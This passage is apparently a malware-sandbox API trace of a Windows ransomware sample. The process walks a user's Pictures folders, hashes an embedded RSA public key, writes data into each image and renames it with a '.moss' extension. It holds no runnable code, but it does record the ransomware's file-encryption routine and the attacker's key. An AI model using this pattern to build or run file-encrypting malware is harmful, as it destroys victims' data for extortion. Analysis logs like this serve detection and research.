lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2555e30, ftCreationTime.dwHighDateTime=0x1d5e5ba, ftLastAccessTime.dwLowDateTime=0x18dafeb0, ftLastAccessTime.dwHighDateTime=0x1d5e131, ftLastWriteTime.dwLowDateTime=0x18dafeb0, ftLastWriteTime.dwHighDateTime=0x1d5e131, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.766] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe46c25b0, ftCreationTime.dwHighDateTime=0x1d5e396, ftLastAccessTime.dwLowDateTime=0xca206b90, ftLastAccessTime.dwHighDateTime=0x1d5deef, ftLastWriteTime.dwLowDateTime=0xca206b90, ftLastWriteTime.dwHighDateTime=0x1d5deef, nFileSizeHigh=0x0, nFileSizeLow=0x6948, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0rEK5NR.jpg", cAlternateFileName="")) returned 1 [0171.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0171.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0171.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ad0 | out: hHeap=0xcd0000) returned 1 [0171.766] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\612n\\0rEK5NR.jpg") returned=".jpg" [0171.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\612n\\0rEK5NR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\612n\\0rek5nr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.767] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=26952) returned 1 [0171.767] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.770] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6922, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.770] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.771] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.771] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x6948, lpOverlapped=0x0) returned 1 [0171.772] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.772] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.772] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.772] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.773] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.773] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.773] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.773] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.773] GetLastError () returned 0x0 [0171.773] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.773] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.773] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.773] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.774] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x6950) returned 0x3b53ea8 [0171.774] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0171.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50d28 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4df68 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50d70 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4df80 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfb0 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfc8 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0171.774] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfb0 | out: hHeap=0xcd0000) returned 1 [0171.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfc8 | out: hHeap=0xcd0000) returned 1 [0171.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0171.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dfc8 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4dfb0 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa27b8 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0171.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0171.775] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6948, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.776] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.776] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\612n\\0rEK5NR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\612n\\0rek5nr.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\612n\\0rEK5NR.jpg.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\612n\\0rek5nr.jpg.moss")) returned 1 [0171.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.777] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0171.778] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe46c25b0, ftCreationTime.dwHighDateTime=0x1d5e396, ftLastAccessTime.dwLowDateTime=0xca206b90, ftLastAccessTime.dwHighDateTime=0x1d5deef, ftLastWriteTime.dwLowDateTime=0xca206b90, ftLastWriteTime.dwHighDateTime=0x1d5deef, nFileSizeHigh=0x0, nFileSizeLow=0x6948, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0rEK5NR.jpg", cAlternateFileName="")) returned 0 [0171.778] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0171.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0171.779] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.779] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\") returned="js4wnFUoxs42X9Y0mylB\\" [0171.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0171.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.779] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.779] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.779] PathFindFileNameW (pszPath="") returned="" [0171.779] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc56cc5c0, ftCreationTime.dwHighDateTime=0x1d5e6ca, ftLastAccessTime.dwLowDateTime=0xa3742920, ftLastAccessTime.dwHighDateTime=0x1d5d98e, ftLastWriteTime.dwLowDateTime=0xa3742920, ftLastWriteTime.dwHighDateTime=0x1d5d98e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.779] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc56cc5c0, ftCreationTime.dwHighDateTime=0x1d5e6ca, ftLastAccessTime.dwLowDateTime=0xa3742920, ftLastAccessTime.dwHighDateTime=0x1d5d98e, ftLastWriteTime.dwLowDateTime=0xa3742920, ftLastWriteTime.dwHighDateTime=0x1d5d98e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.779] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x198bd350, ftCreationTime.dwHighDateTime=0x1d5e18d, ftLastAccessTime.dwLowDateTime=0x5fc64a70, ftLastAccessTime.dwHighDateTime=0x1d5de23, ftLastWriteTime.dwLowDateTime=0x5fc64a70, ftLastWriteTime.dwHighDateTime=0x1d5de23, nFileSizeHigh=0x0, nFileSizeLow=0xfc92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5PrcIytV.png", cAlternateFileName="")) returned 1 [0171.779] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\5PrcIytV.png") returned=".png" [0171.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\5PrcIytV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\5prciytv.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.780] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=64658) returned 1 [0171.780] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.782] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xfc6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.782] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.784] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.784] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xfc92, lpOverlapped=0x0) returned 1 [0171.784] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.784] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0171.785] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.785] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.785] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.785] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.785] GetLastError () returned 0x0 [0171.786] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.786] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0171.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.786] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.786] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.786] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xfc90) returned 0x3b62d40 [0171.786] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0171.786] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50d70 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4df80 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50db8 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4df98 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfc8 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.786] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfe0 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0171.787] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfc8 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfe0 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dfe0 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4dfc8 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa2470 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2588 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfe0 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfc8 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0171.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0171.787] GetCurrentThreadId () returned 0x324 [0171.787] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4f628 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.788] RtlAllocateHeap (HeapHandle=0xcd0000, 